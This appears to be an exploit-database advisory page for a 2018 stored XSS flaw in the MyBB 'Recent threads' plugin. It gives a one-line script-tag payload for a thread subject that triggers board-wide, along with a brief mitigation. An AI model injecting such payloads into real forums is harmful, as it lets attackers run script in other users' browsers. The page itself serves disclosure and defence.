header-logo
Suggest Exploit
vendor:
MyBB Recent threads
by:
Perileos
8.8
CVSS
HIGH
Persistent XSS
79
CWE
Product Name: MyBB Recent threads
Affected Version From: 17.0
Affected Version To: 17.0
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2018

MyBB Recent threads

Create a thread with the following subject <p """><SCRIPT>alert("XSS")</SCRIPT>"> and navigate to the index to see a board wide persistent XSS alert.

Mitigation:

Validate user input and encode output
Source

Exploit-DB raw data:

# Exploit Title: MyBB Recent threads
# Date: 4th April 2018
# Exploit Author: Perileos
# Software Link: https://community.mybb.com/mods.php?action=view&pid=191
# Version: 17.0
# Tested on: Windows 10

1. Description:
This plugin shows recent threads in the side bar on your MyBB forum.

2. Proof of concept:

Persistent XSS
- Create a thread with the following subject <p
"""><SCRIPT>alert("XSS")</SCRIPT>">
- Navigate to the index to see a board wide persistent XSS alert.

Navigation

Suggest Exploit

Services By CQR